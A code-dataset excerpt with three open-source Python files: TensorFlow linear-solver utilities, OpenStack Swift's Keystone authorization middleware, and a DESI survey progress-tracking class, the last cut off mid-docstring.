code
stringlengths 3
1.05M
| repo_name
stringlengths 5
104
| path
stringlengths 4
251
| language
stringclasses 1
value | license
stringclasses 15
values | size
int64 3
1.05M
|
---|---|---|---|---|---|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utility functions for solvers."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import tensorflow as tf
def create_operator(matrix):
"""Creates a linear operator from a rank-2 tensor."""
linear_operator = collections.namedtuple(
"LinearOperator", ["shape", "dtype", "apply", "apply_adjoint"])
# TODO(rmlarsen): Handle SparseTensor.
shape = matrix.get_shape()
if shape.is_fully_defined():
shape = shape.as_list()
else:
shape = tf.shape(matrix)
return linear_operator(
shape=shape,
dtype=matrix.dtype,
apply=lambda v: tf.matmul(matrix, v, adjoint_a=False),
apply_adjoint=lambda v: tf.matmul(matrix, v, adjoint_a=True))
# TODO(rmlarsen): Measure if we should just call matmul.
def dot(x, y):
return tf.reduce_sum(tf.conj(x) * y)
# TODO(rmlarsen): Implement matrix/vector norm op in C++ in core.
# We need 1-norm, inf-norm, and Frobenius norm.
def l2norm_squared(v):
return tf.constant(2, dtype=v.dtype.base_dtype) * tf.nn.l2_loss(v)
def l2norm(v):
return tf.sqrt(l2norm_squared(v))
def l2normalize(v):
norm = l2norm(v)
return v / norm, norm
| AndreasMadsen/tensorflow | tensorflow/contrib/solvers/python/ops/util.py | Python | apache-2.0 | 1,889 |
# Copyright 2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from swift.common import utils as swift_utils
from swift.common.http import is_success
from swift.common.middleware import acl as swift_acl
from swift.common.request_helpers import get_sys_meta_prefix
from swift.common.swob import HTTPNotFound, HTTPForbidden, HTTPUnauthorized
from swift.common.utils import config_read_reseller_options, list_from_csv
from swift.proxy.controllers.base import get_account_info
import functools
PROJECT_DOMAIN_ID_HEADER = 'x-account-project-domain-id'
PROJECT_DOMAIN_ID_SYSMETA_HEADER = \
get_sys_meta_prefix('account') + 'project-domain-id'
# a string that is unique w.r.t valid ids
UNKNOWN_ID = '_unknown'
class KeystoneAuth(object):
"""Swift middleware to Keystone authorization system.
In Swift's proxy-server.conf add this middleware to your pipeline::
[pipeline:main]
pipeline = catch_errors cache authtoken keystoneauth proxy-server
Make sure you have the authtoken middleware before the
keystoneauth middleware.
The authtoken middleware will take care of validating the user and
keystoneauth will authorize access.
The authtoken middleware is shipped with keystonemiddleware - it
does not have any other dependencies than itself so you can either
install it by copying the file directly in your python path or by
installing keystonemiddleware.
If support is required for unvalidated users (as with anonymous
access) or for formpost/staticweb/tempurl middleware, authtoken will
need to be configured with ``delay_auth_decision`` set to true. See
the Keystone documentation for more detail on how to configure the
authtoken middleware.
In proxy-server.conf you will need to have the setting account
auto creation to true::
[app:proxy-server]
account_autocreate = true
And add a swift authorization filter section, such as::
[filter:keystoneauth]
use = egg:swift#keystoneauth
operator_roles = admin, swiftoperator
The user who is able to give ACL / create Containers permissions
will be the user with a role listed in the ``operator_roles``
setting which by default includes the admin and the swiftoperator
roles.
The keystoneauth middleware maps a Keystone project/tenant to an account
in Swift by adding a prefix (``AUTH_`` by default) to the tenant/project
id.. For example, if the project id is ``1234``, the path is
``/v1/AUTH_1234``.
If the ``is_admin`` option is ``true``, a user whose username is the same
as the project name and who has any role on the project will have access
rights elevated to be the same as if the user had one of the
``operator_roles``. Note that the condition compares names rather than
UUIDs. This option is deprecated. It is ``false`` by default.
If you need to have a different reseller_prefix to be able to
mix different auth servers you can configure the option
``reseller_prefix`` in your keystoneauth entry like this::
reseller_prefix = NEWAUTH
Don't forget to also update the Keystone service endpoint configuration to
use NEWAUTH in the path.
It is possible to have several accounts associated with the same project.
This is done by listing several prefixes as shown in the following
example:
reseller_prefix = AUTH, SERVICE
This means that for project id '1234', the paths '/v1/AUTH_1234' and
'/v1/SERVICE_1234' are associated with the project and are authorized
using roles that a user has with that project. The core use of this feature
is that it is possible to provide different rules for each account
prefix. The following parameters may be prefixed with the appropriate
prefix:
operator_roles
service_roles
For backward compatibility, no prefix implies the parameter
applies to all reseller_prefixes. Here is an example, using two
prefixes::
reseller_prefix = AUTH, SERVICE
# The next three lines have identical effects (since the first applies
# to both prefixes).
operator_roles = admin, swiftoperator
AUTH_operator_roles = admin, swiftoperator
SERVICE_operator_roles = admin, swiftoperator
# The next line only applies to accounts with the SERVICE prefix
SERVICE_operator_roles = admin, some_other_role
X-Service-Token tokens are supported by the inclusion of the service_roles
configuration option. When present, this option requires that the
X-Service-Token header supply a token from a user who has a role listed
in service_roles. Here is an example configuration::
reseller_prefix = AUTH, SERVICE
AUTH_operator_roles = admin, swiftoperator
SERVICE_operator_roles = admin, swiftoperator
SERVICE_service_roles = service
The keystoneauth middleware supports cross-tenant access control using
the syntax ``<tenant>:<user>`` to specify a grantee in container Access
Control Lists (ACLs). For a request to be granted by an ACL, the grantee
``<tenant>`` must match the UUID of the tenant to which the request
token is scoped and the grantee ``<user>`` must match the UUID of the
user authenticated by the request token.
Note that names must no longer be used in cross-tenant ACLs because with
the introduction of domains in keystone names are no longer globally
unique.
For backwards compatibility, ACLs using names will be granted by
keystoneauth when it can be established that the grantee tenant,
the grantee user and the tenant being accessed are either not yet in a
domain (e.g. the request token has been obtained via the keystone v2
API) or are all in the default domain to which legacy accounts would
have been migrated. The default domain is identified by its UUID,
which by default has the value ``default``. This can be changed by
setting the ``default_domain_id`` option in the keystoneauth
configuration::
default_domain_id = default
The backwards compatible behavior can be disabled by setting the config
option ``allow_names_in_acls`` to false::
allow_names_in_acls = false
To enable this backwards compatibility, keystoneauth will attempt to
determine the domain id of a tenant when any new account is created,
and persist this as account metadata. If an account is created for a tenant
using a token with reselleradmin role that is not scoped on that tenant,
keystoneauth is unable to determine the domain id of the tenant;
keystoneauth will assume that the tenant may not be in the default domain
and therefore not match names in ACLs for that account.
By default, middleware higher in the WSGI pipeline may override auth
processing, useful for middleware such as tempurl and formpost. If you know
you're not going to use such middleware and you want a bit of extra
security you can disable this behaviour by setting the ``allow_overrides``
option to ``false``::
allow_overrides = false
:param app: The next WSGI app in the pipeline
:param conf: The dict of configuration values
"""
def __init__(self, app, conf):
self.app = app
self.conf = conf
self.logger = swift_utils.get_logger(conf, log_route='keystoneauth')
self.reseller_prefixes, self.account_rules = \
config_read_reseller_options(conf,
dict(operator_roles=['admin',
'swiftoperator'],
service_roles=[]))
self.reseller_admin_role = conf.get('reseller_admin_role',
'ResellerAdmin').lower()
config_is_admin = conf.get('is_admin', "false").lower()
self.is_admin = swift_utils.config_true_value(config_is_admin)
config_overrides = conf.get('allow_overrides', 't').lower()
self.allow_overrides = swift_utils.config_true_value(config_overrides)
self.default_domain_id = conf.get('default_domain_id', 'default')
self.allow_names_in_acls = swift_utils.config_true_value(
conf.get('allow_names_in_acls', 'true'))
def __call__(self, environ, start_response):
identity = self._keystone_identity(environ)
# Check if one of the middleware like tempurl or formpost have
# set the swift.authorize_override environ and want to control the
# authentication
if (self.allow_overrides and
environ.get('swift.authorize_override', False)):
msg = 'Authorizing from an overriding middleware'
self.logger.debug(msg)
return self.app(environ, start_response)
if identity:
self.logger.debug('Using identity: %r', identity)
environ['keystone.identity'] = identity
environ['REMOTE_USER'] = identity.get('tenant')
env_identity = self._integral_keystone_identity(environ)
environ['swift.authorize'] = functools.partial(
self.authorize, env_identity)
user_roles = (r.lower() for r in identity.get('roles', []))
if self.reseller_admin_role in user_roles:
environ['reseller_request'] = True
else:
self.logger.debug('Authorizing as anonymous')
environ['swift.authorize'] = self.authorize_anonymous
environ['swift.clean_acl'] = swift_acl.clean_acl
def keystone_start_response(status, response_headers, exc_info=None):
project_domain_id = None
for key, val in response_headers:
if key.lower() == PROJECT_DOMAIN_ID_SYSMETA_HEADER:
project_domain_id = val
break
if project_domain_id:
response_headers.append((PROJECT_DOMAIN_ID_HEADER,
project_domain_id))
return start_response(status, response_headers, exc_info)
return self.app(environ, keystone_start_response)
def _keystone_identity(self, environ):
"""Extract the identity from the Keystone auth component."""
# In next release, we would add user id in env['keystone.identity'] by
# using _integral_keystone_identity to replace current
# _keystone_identity. The purpose of keeping it in this release it for
# back compatibility.
if environ.get('HTTP_X_IDENTITY_STATUS') != 'Confirmed':
return
roles = []
if 'HTTP_X_ROLES' in environ:
roles = environ['HTTP_X_ROLES'].split(',')
identity = {'user': environ.get('HTTP_X_USER_NAME'),
'tenant': (environ.get('HTTP_X_TENANT_ID'),
environ.get('HTTP_X_TENANT_NAME')),
'roles': roles}
return identity
def _integral_keystone_identity(self, environ):
"""Extract the identity from the Keystone auth component."""
if environ.get('HTTP_X_IDENTITY_STATUS') != 'Confirmed':
return
roles = list_from_csv(environ.get('HTTP_X_ROLES', ''))
service_roles = list_from_csv(environ.get('HTTP_X_SERVICE_ROLES', ''))
identity = {'user': (environ.get('HTTP_X_USER_ID'),
environ.get('HTTP_X_USER_NAME')),
'tenant': (environ.get('HTTP_X_TENANT_ID'),
environ.get('HTTP_X_TENANT_NAME')),
'roles': roles,
'service_roles': service_roles}
token_info = environ.get('keystone.token_info', {})
auth_version = 0
user_domain = project_domain = (None, None)
if 'access' in token_info:
# ignore any domain id headers that authtoken may have set
auth_version = 2
elif 'token' in token_info:
auth_version = 3
user_domain = (environ.get('HTTP_X_USER_DOMAIN_ID'),
environ.get('HTTP_X_USER_DOMAIN_NAME'))
project_domain = (environ.get('HTTP_X_PROJECT_DOMAIN_ID'),
environ.get('HTTP_X_PROJECT_DOMAIN_NAME'))
identity['user_domain'] = user_domain
identity['project_domain'] = project_domain
identity['auth_version'] = auth_version
return identity
def _get_account_name(self, prefix, tenant_id):
return '%s%s' % (prefix, tenant_id)
def _account_matches_tenant(self, account, tenant_id):
"""Check if account belongs to a project/tenant"""
for prefix in self.reseller_prefixes:
if self._get_account_name(prefix, tenant_id) == account:
return True
return False
def _get_account_prefix(self, account):
"""Get the prefix of an account"""
# Empty prefix matches everything, so try to match others first
for prefix in [pre for pre in self.reseller_prefixes if pre != '']:
if account.startswith(prefix):
return prefix
if '' in self.reseller_prefixes:
return ''
return None
def _get_project_domain_id(self, environ):
info = get_account_info(environ, self.app, 'KS')
domain_id = info.get('sysmeta', {}).get('project-domain-id')
exists = is_success(info.get('status', 0))
return exists, domain_id
def _set_project_domain_id(self, req, path_parts, env_identity):
'''
Try to determine the project domain id and save it as
account metadata. Do this for a PUT or POST to the
account, and also for a container PUT in case that
causes the account to be auto-created.
'''
if PROJECT_DOMAIN_ID_SYSMETA_HEADER in req.headers:
return
version, account, container, obj = path_parts
method = req.method
if (obj or (container and method != 'PUT')
or method not in ['PUT', 'POST']):
return
tenant_id, tenant_name = env_identity['tenant']
exists, sysmeta_id = self._get_project_domain_id(req.environ)
req_has_id, req_id, new_id = False, None, None
if self._account_matches_tenant(account, tenant_id):
# domain id can be inferred from request (may be None)
req_has_id = True
req_id = env_identity['project_domain'][0]
if not exists:
# new account so set a domain id
new_id = req_id if req_has_id else UNKNOWN_ID
elif sysmeta_id is None and req_id == self.default_domain_id:
# legacy account, update if default domain id in req
new_id = req_id
elif sysmeta_id == UNKNOWN_ID and req_has_id:
# unknown domain, update if req confirms domain
new_id = req_id or ''
elif req_has_id and sysmeta_id != req_id:
self.logger.warn("Inconsistent project domain id: " +
"%s in token vs %s in account metadata."
% (req_id, sysmeta_id))
if new_id is not None:
req.headers[PROJECT_DOMAIN_ID_SYSMETA_HEADER] = new_id
def _is_name_allowed_in_acl(self, req, path_parts, identity):
if not self.allow_names_in_acls:
return False
user_domain_id = identity['user_domain'][0]
if user_domain_id and user_domain_id != self.default_domain_id:
return False
proj_domain_id = identity['project_domain'][0]
if proj_domain_id and proj_domain_id != self.default_domain_id:
return False
# request user and scoped project are both in default domain
tenant_id, tenant_name = identity['tenant']
version, account, container, obj = path_parts
if self._account_matches_tenant(account, tenant_id):
# account == scoped project, so account is also in default domain
allow = True
else:
# retrieve account project domain id from account sysmeta
exists, acc_domain_id = self._get_project_domain_id(req.environ)
allow = exists and acc_domain_id in [self.default_domain_id, None]
if allow:
self.logger.debug("Names allowed in acls.")
return allow
def _authorize_cross_tenant(self, user_id, user_name,
tenant_id, tenant_name, roles,
allow_names=True):
"""Check cross-tenant ACLs.
Match tenant:user, tenant and user could be its id, name or '*'
:param user_id: The user id from the identity token.
:param user_name: The user name from the identity token.
:param tenant_id: The tenant ID from the identity token.
:param tenant_name: The tenant name from the identity token.
:param roles: The given container ACL.
:param allow_names: If True then attempt to match tenant and user names
as well as id's.
:returns: matched string if tenant(name/id/*):user(name/id/*) matches
the given ACL.
None otherwise.
"""
tenant_match = [tenant_id, '*']
user_match = [user_id, '*']
if allow_names:
tenant_match = tenant_match + [tenant_name]
user_match = user_match + [user_name]
for tenant in tenant_match:
for user in user_match:
s = '%s:%s' % (tenant, user)
if s in roles:
return s
return None
def authorize(self, env_identity, req):
tenant_id, tenant_name = env_identity['tenant']
user_id, user_name = env_identity['user']
referrers, roles = swift_acl.parse_acl(getattr(req, 'acl', None))
#allow OPTIONS requests to proceed as normal
if req.method == 'OPTIONS':
return
try:
part = req.split_path(1, 4, True)
version, account, container, obj = part
except ValueError:
return HTTPNotFound(request=req)
self._set_project_domain_id(req, part, env_identity)
user_roles = [r.lower() for r in env_identity.get('roles', [])]
user_service_roles = [r.lower() for r in env_identity.get(
'service_roles', [])]
# Give unconditional access to a user with the reseller_admin
# role.
if self.reseller_admin_role in user_roles:
msg = 'User %s has reseller admin authorizing'
self.logger.debug(msg, tenant_id)
req.environ['swift_owner'] = True
return
# If we are not reseller admin and user is trying to delete its own
# account then deny it.
if not container and not obj and req.method == 'DELETE':
# User is not allowed to issue a DELETE on its own account
msg = 'User %s:%s is not allowed to delete its own account'
self.logger.debug(msg, tenant_name, user_name)
return self.denied_response(req)
# cross-tenant authorization
matched_acl = None
if roles:
allow_names = self._is_name_allowed_in_acl(req, part, env_identity)
matched_acl = self._authorize_cross_tenant(user_id, user_name,
tenant_id, tenant_name,
roles, allow_names)
if matched_acl is not None:
log_msg = 'user %s allowed in ACL authorizing.'
self.logger.debug(log_msg, matched_acl)
return
acl_authorized = self._authorize_unconfirmed_identity(req, obj,
referrers,
roles)
if acl_authorized:
return
# Check if a user tries to access an account that does not match their
# token
if not self._account_matches_tenant(account, tenant_id):
log_msg = 'tenant mismatch: %s != %s'
self.logger.debug(log_msg, account, tenant_id)
return self.denied_response(req)
# Compare roles from tokens against the configuration options:
#
# X-Auth-Token role Has specified X-Service-Token role Grant
# in operator_roles? service_roles? in service_roles? swift_owner?
# ------------------ -------------- -------------------- ------------
# yes yes yes yes
# yes no don't care yes
# no don't care don't care no
# ------------------ -------------- -------------------- ------------
account_prefix = self._get_account_prefix(account)
operator_roles = self.account_rules[account_prefix]['operator_roles']
have_operator_role = set(operator_roles).intersection(
set(user_roles))
service_roles = self.account_rules[account_prefix]['service_roles']
have_service_role = set(service_roles).intersection(
set(user_service_roles))
if have_operator_role and (service_roles and have_service_role):
req.environ['swift_owner'] = True
elif have_operator_role and not service_roles:
req.environ['swift_owner'] = True
if req.environ.get('swift_owner'):
log_msg = 'allow user with role(s) %s as account admin'
self.logger.debug(log_msg, ','.join(have_operator_role.union(
have_service_role)))
return
# If user is of the same name of the tenant then make owner of it.
if self.is_admin and user_name == tenant_name:
self.logger.warning("the is_admin feature has been deprecated "
"and will be removed in the future "
"update your config file")
req.environ['swift_owner'] = True
return
if acl_authorized is not None:
return self.denied_response(req)
# Check if we have the role in the userroles and allow it
for user_role in user_roles:
if user_role in (r.lower() for r in roles):
log_msg = 'user %s:%s allowed in ACL: %s authorizing'
self.logger.debug(log_msg, tenant_name, user_name,
user_role)
return
return self.denied_response(req)
def authorize_anonymous(self, req):
"""
Authorize an anonymous request.
:returns: None if authorization is granted, an error page otherwise.
"""
try:
part = req.split_path(1, 4, True)
version, account, container, obj = part
except ValueError:
return HTTPNotFound(request=req)
#allow OPTIONS requests to proceed as normal
if req.method == 'OPTIONS':
return
is_authoritative_authz = (account and
(self._get_account_prefix(account) in
self.reseller_prefixes))
if not is_authoritative_authz:
return self.denied_response(req)
referrers, roles = swift_acl.parse_acl(getattr(req, 'acl', None))
authorized = self._authorize_unconfirmed_identity(req, obj, referrers,
roles)
if not authorized:
return self.denied_response(req)
def _authorize_unconfirmed_identity(self, req, obj, referrers, roles):
""""
Perform authorization for access that does not require a
confirmed identity.
:returns: A boolean if authorization is granted or denied. None if
a determination could not be made.
"""
# Allow container sync.
if (req.environ.get('swift_sync_key')
and (req.environ['swift_sync_key'] ==
req.headers.get('x-container-sync-key', None))
and 'x-timestamp' in req.headers):
log_msg = 'allowing proxy %s for container-sync'
self.logger.debug(log_msg, req.remote_addr)
return True
# Check if referrer is allowed.
if swift_acl.referrer_allowed(req.referer, referrers):
if obj or '.rlistings' in roles:
log_msg = 'authorizing %s via referer ACL'
self.logger.debug(log_msg, req.referrer)
return True
return False
def denied_response(self, req):
"""Deny WSGI Response.
Returns a standard WSGI response callable with the status of 403 or 401
depending on whether the REMOTE_USER is set or not.
"""
if req.remote_user:
return HTTPForbidden(request=req)
else:
return HTTPUnauthorized(request=req)
def filter_factory(global_conf, **local_conf):
"""Returns a WSGI filter app for use with paste.deploy."""
conf = global_conf.copy()
conf.update(local_conf)
def auth_filter(app):
return KeystoneAuth(app, conf)
return auth_filter
| dpgoetz/swift | swift/common/middleware/keystoneauth.py | Python | apache-2.0 | 25,905 |
"""Track progress of completed DESI observations.
"""
from __future__ import print_function, division
import os.path
import numpy as np
import astropy.table
import astropy.units as u
import desimodel.io
import desiutil.log
import desisurvey.config
import desisurvey.utils
# Increment this value whenever a non-backwards compatible change to the
# table schema is introduced.
_version = 4
class Progress(object):
"""Initialize a progress tracking object.
Progress can either be restored from a file or created from scratch.
The progress table is designed to minmize duplication of static tile data
that is already tabulated in the footprint definition table, except for
the PASS, RA, DEC columns which are useful for generating plots.
The progress table also does not capture ephemeris data that can be
easily reproduced from an exposure time stamp.
Parameters
----------
restore : str or astropy.table.Table or None
Read an existing progress record from the specified file name or
an exsiting table. A relative path name refers to the
:meth:`configuration output path
<desisurvey.config.Configuration.get_path>`. Creates a new progress
record from sratch when None.
max_exposures : int
Maximum number of exposures of a single tile that a newly created
table will allocate space for. Ignored when restoring a previous
progress record.
"""
def __init__(self, restore=None, max_exposures=32):
self.log = desiutil.log.get_logger()
# Lookup the completeness SNR2 threshold to use.
config = desisurvey.config.Configuration()
self.min_snr2 = config.min_snr2_fraction()
if restore is None:
# Load the list of tiles to observe.
tiles = astropy.table.Table(
desimodel.io.load_tiles(onlydesi=True, extra=False,
tilesfile=config.tiles_file() ))
num_tiles = len(tiles)
# Initialize a new progress table.
meta = dict(VERSION=_version)
table = astropy.table.Table(meta=meta)
table['tileid'] = astropy.table.Column(
length=num_tiles, dtype=np.int32,
description='DESI footprint tile ID')
table['pass'] = astropy.table.Column(
length=num_tiles, dtype=np.int32,
description='Observing pass number starting at zero')
table['ra'] = astropy.table.Column(
length=num_tiles, description='TILE center RA in degrees',
unit='deg', format='%.1f')
table['dec'] = astropy.table.Column(
length=num_tiles, description='TILE center DEC in degrees',
unit='deg', format='%.1f')
table['status'] = astropy.table.Column(
length=num_tiles, dtype=np.int32,
description='Observing status: 0=none, 1=partial, 2=done')
table['covered'] = astropy.table.Column(
length=num_tiles, dtype=np.int32,
description='Tile covered on this day number >=0 (or -1)')
table['available'] = astropy.table.Column(
length=num_tiles, dtype=np.int32,
description='Tile available on this day number >=0 (or -1)')
table['planned'] = astropy.table.Column(
length=num_tiles, dtype=np.int32,
description='Tile first planned on this day number >=0 (or -1)')
# Add per-exposure columns.
table['mjd'] = astropy.table.Column(
length=num_tiles, shape=(max_exposures,), format='%.5f',
description='MJD of exposure start time')
table['exptime'] = astropy.table.Column(
length=num_tiles, shape=(max_exposures,), format='%.1f',
description='Exposure duration in seconds', unit='s')
table['snr2frac'] = astropy.table.Column(
length=num_tiles, shape=(max_exposures,), format='%.3f',
description='Fraction of target S/N**2 ratio achieved')
table['airmass'] = astropy.table.Column(
length=num_tiles, shape=(max_exposures,), format='%.1f',
description='Estimated airmass of observation')
table['seeing'] = astropy.table.Column(
length=num_tiles, shape=(max_exposures,), format='%.1f',
description='Estimated FWHM seeing of observation in arcsecs',
unit='arcsec')
table['transparency'] = astropy.table.Column(
length=num_tiles, shape=(max_exposures,), format='%.1f',
description='Estimated transparency of observation')
table['moonfrac'] = astropy.table.Column(
length=num_tiles, shape=(max_exposures,), format='%.3f',
description='Moon illuminated fraction (0-1)')
table['moonalt'] = astropy.table.Column(
length=num_tiles, shape=(max_exposures,), format='%.1f',
description='Moon altitude angle in degrees', unit='deg')
table['moonsep'] = astropy.table.Column(
length=num_tiles, shape=(max_exposures,), format='%.1f',
description='Moon-tile separation angle in degrees', unit='deg')
# Copy tile data.
table['tileid'] = tiles['TILEID']
table['pass'] = tiles['PASS']
table['ra'] = tiles['RA']
table['dec'] = tiles['DEC']
# Initialize other columns.
table['status'] = 0
table['covered'] = -1
table['available'] = -1
table['planned'] = -1
table['mjd'] = 0.
table['exptime'] = 0.
table['snr2frac'] = 0.
table['airmass'] = 0.
table['seeing'] = 0.
table['transparency'] = 0.
else:
if isinstance(restore, Progress):
table = restore._table
elif isinstance(restore, astropy.table.Table):
table = restore
else:
filename = config.get_path(restore)
if not os.path.exists(filename):
raise ValueError('Invalid restore: {0}.'.format(restore))
table = astropy.table.Table.read(filename)
self.log.info('Loaded progress from {0}.'.format(filename))
# Check that this table has the current version.
if table.meta['VERSION'] != _version:
raise RuntimeError(
'Progress table has incompatible version {0}.'
.format(table.meta['VERSION']))
# Check that the status column matches the current min_snr2.
snr2sum = table['snr2frac'].data.sum(axis=1)
if not np.all(snr2sum >= 0):
raise RuntimeError('Found invalid snr2frac values.')
status = np.ones_like(table['status'])
status[snr2sum == 0] = 0
status[snr2sum >= self.min_snr2] = 2
if not np.all(table['status'] == status):
self.log.warn('Updating status values for min(SNR2) = {0:.1f}.'
.format(self.min_snr2))
table['status'] = status
# We could do more sanity checks here, but they shouldn't be
# necessary unless the table has been modified outside this class.
# Initialize attributes from table data.
self._table = table
mjd = table['mjd'].data
observed = mjd > 0
if np.any(observed):
self._num_exp = np.count_nonzero(observed)
self._first_mjd = np.min(mjd[observed])
self._last_mjd = np.max(mjd[observed])
last = np.argmax(mjd.max(axis=1))
self._last_tile = self._table[last]
else:
self._num_exp = 0
self._first_mjd = self._last_mjd = 0.
self._last_tile = None
@property
def num_exp(self):
"""Number of exposures recorded."""
return self._num_exp
@property
def num_tiles(self):
"""Number of tiles in DESI footprint"""
return len(self._table)
@property
def first_mjd(self):
"""MJD of first exposure or 0 if no exposures have been added."""
return self._first_mjd
@property
def last_mjd(self):
"""MJD of most recent exposure or 0 if no exposures have been added."""
return self._last_mjd
@property
def last_tile(self):
"""Row corresponding to the last observed tile, or None."""
return self._last_tile
@property
def max_exposures(self):
"""Maximum allowed number of exposures of a single tile."""
return len(self._table[0]['mjd'])
def completed(self, include_partial=True, only_passes=None, as_tuple=False):
"""Number of tiles completed.
Completion is based on the sum of ``snr2frac`` values for all exposures
of each tiles. A completed tile (with ``status`` of 2) counts as one
towards the completion value, even if its ``snr2frac`` exceeds the
minimum required SNR**2 fraction.
Can be combined with :meth:`copy_range` to reconstruct the number of
completed observations over an arbitrary date range.
Parameters
----------
include_partial : bool
Include partially completed tiles according to their sum of snfrac
values.
only_passes : tuple or int or None
Only include tiles in the specified pass or passes. All passes
are included when None.
as_tuple : bool
Return (num_complete, num_total, percent_complete) as a tuple
instead of just num_complete.
Returns
-------
float or tuple
Either num_complete or (num_complete, num_total, percent_complete)
depending on ``as_tuple``. The number of tiles completed will
always be an integer (returned as a float) when ``include_partial``
is False, and will generally be non-integer otherwise.
"""
# Restrict to the specified pass(es) if requested.
if only_passes is not None:
try:
only_passes = tuple(only_passes)
except TypeError:
only_passes = only_passes,
sel = np.in1d(self._table['pass'].data, only_passes)
table = self._table[sel]
else:
table = self._table
# Calculate the total SNR**2 for each tile.
snr2sum = table['snr2frac'].data.sum(axis=1)
# Count fully completed tiles as 1.
completed = snr2sum >= self.min_snr2
num_complete = float(np.count_nonzero(completed))
if include_partial:
# Add partial SNR**2 sums.
num_complete += snr2sum[~completed].sum()
if as_tuple:
num_total = len(table)
percent_complete = 100. * num_complete / num_total
return num_complete, num_total, percent_complete
else:
return num_complete
def save(self, filename, overwrite=True):
"""Save the current progress to a file.
The saved file can be restored from disk using our constructor,
although column descriptions will be lost since they are not
propagated when writing a table to a FITS file.
Parameters
----------
filename : str
Name of the file where the progress record should be saved. A
relative path name refers to the :meth:`configuration output path
<desisurvey.config.Configuration.get_path>`.
overwrite : bool
Silently overwrite any existing file when this is True.
"""
config = desisurvey.config.Configuration()
filename = config.get_path(filename)
self._table.write(filename, overwrite=overwrite)
self.log.info('Saved progress to {0}.'.format(filename))
def get_tile(self, tile_id):
"""Lookup the progress of a single tile.
Parameters
----------
tile_id : integer
Valid DESI footprint tile ID.
Returns
-------
astropy.table.Row
Row of progress table for the requested tile.
"""
row_sel = np.where(self._table['tileid'] == tile_id)[0]
if len(row_sel) != 1:
raise ValueError('Invalid tile_id {0}.'.format(tile_id))
return self._table[row_sel[0]]
def get_summary(self, include='observed'):
"""Get a per-tile summary of progress so far.
Returns a new table so any modifications are decoupled from our
internal table. Exposure MJD values are summarized as separate
``mjd_min`` and ``mjd_max`` columns, with both equal to zero for
un-observed tiles. The summary ``exptime`` and ``snr2frac`` columns
are sums of the individual exposures. The summary ``airmass``,
``seeing`` and ``transparency`` columns are means. A ``nexp`` column
counts the number of exposures for each tile. The moon parameters are
not summarized.
Can be combined with :meth:`copy_range` to summarize observations during
a range of dates.
Parameters
----------
include : 'all', 'observed', or 'completed'
Specify which tiles to include in the summary. The 'observed'
selection will include tiles that have been observed at least
once but have not yet reached their SNR**2 goal.
"""
min_status = dict(all=0, observed=1, completed=2)
if include not in min_status.keys():
raise ValueError('Invalid include option: pick one of {0}.'
.format(', '.join(min_status.keys())))
# Start a new summary table with the selected rows.
sel = self._table['status'] >= min_status[include]
summary = self._table[sel][[
'tileid', 'pass', 'ra', 'dec', 'status',
'covered', 'available', 'planned']]
# Summarize exposure start times.
col = self._table['mjd']
mjd = col.data[sel]
summary['mjd_min'] = astropy.table.Column(
mjd[:, 0], unit=col.unit, format=col.format,
description='First exposure start MJD')
summary['mjd_max'] = astropy.table.Column(
mjd.max(axis=1), unit=col.unit, format=col.format,
description='Last exposure start MJD')
# Sum the remaining per-exposure columns.
for name in (
'exptime', 'snr2frac', 'airmass', 'seeing', 'transparency'):
col = self._table[name]
summary[name] = astropy.table.Column(
col.data[sel].sum(axis=1), unit=col.unit, format=col.format,
description=col.description)
# Convert the airmass, seeing and transparency sums to means. We use
# mean rather than median since it is easier to calculate with a
# variable nexp.
nexp = (mjd > 0).sum(axis=1).astype(int)
mask = nexp > 0
summary['airmass'][mask] /= nexp[mask]
summary['seeing'][mask] /= nexp[mask]
summary['transparency'][mask] /= nexp[mask]
# Record the number of exposures in a new column.
summary['nexp'] = nexp
return summary
def copy_range(self, mjd_min=None, mjd_max=None):
"""Return a copy of progress during a date range.
Parameters
----------
mjd_min : float or None
Only include exposures with mjd >= mjd_min.
mjd_max : float
Only include exposures with mjd < mjd_max.
Returns
-------
Progress
New object with any exposures outside the specified MJD range
zeroed out and ``status`` values updated accordingly.
"""
if mjd_min and mjd_max and mjd_min >= mjd_max:
raise ValueError('Expected mjd_min < mjd_max.')
# Identify which exposures to drop.
mjd = self._table['mjd'].data
drop = (mjd == 0)
if mjd_min is not None:
drop |= (mjd < mjd_min)
if mjd_max is not None:
drop |= (mjd >= mjd_max)
# Copy our table.
table = self._table.copy()
# Zero dropped exposures.
for name in (
'mjd', 'exptime', 'snr2frac', 'airmass', 'seeing', 'transparency'):
table[name][drop] = 0.
# Recompute the status column.
snr2sum = table['snr2frac'].data.sum(axis=1)
assert np.all(snr2sum >= 0)
table['status'] = 1
table['status'][snr2sum == 0] = 0
table['status'][snr2sum >= self.min_snr2] = 2
if mjd_max is not None:
# Rewind the covered and available columns.
config = desisurvey.config.Configuration()
max_day_number = desisurvey.utils.day_number(mjd_max)
table['covered'][table['covered'] > max_day_number] = -1
table['available'][table['available'] > max_day_number] = -1
table['planned'][table['planned'] > max_day_number] = -1
# Return a new progress object with this table.
return Progress(restore=table)
def add_exposure(self, tile_id, start, exptime, snr2frac, airmass, seeing,
transparency, moonfrac, moonalt, moonsep):
"""Add a single exposure to the progress.
Parameters
----------
tile_id : int
DESI footprint tile ID
start : astropy.time.Time
Exposure start time. Must be after any previous exposure.
exptime : astropy.units.Quantity
Exposure open shutter time with units.
snr2frac : float
Fraction of the design SNR**2 achieved during this exposure.
airmass : float
Estimated airmass of this exposure.
seeing : float
Estimated FWHM seeing of this exposure in arcseconds.
transparency : float
Estimated atmospheric transparency of this exposure.
moonfrac : float
Moon illuminated fraction (0-1).
moonalt : float
Moon altitude angle in degrees.
moonsep : float
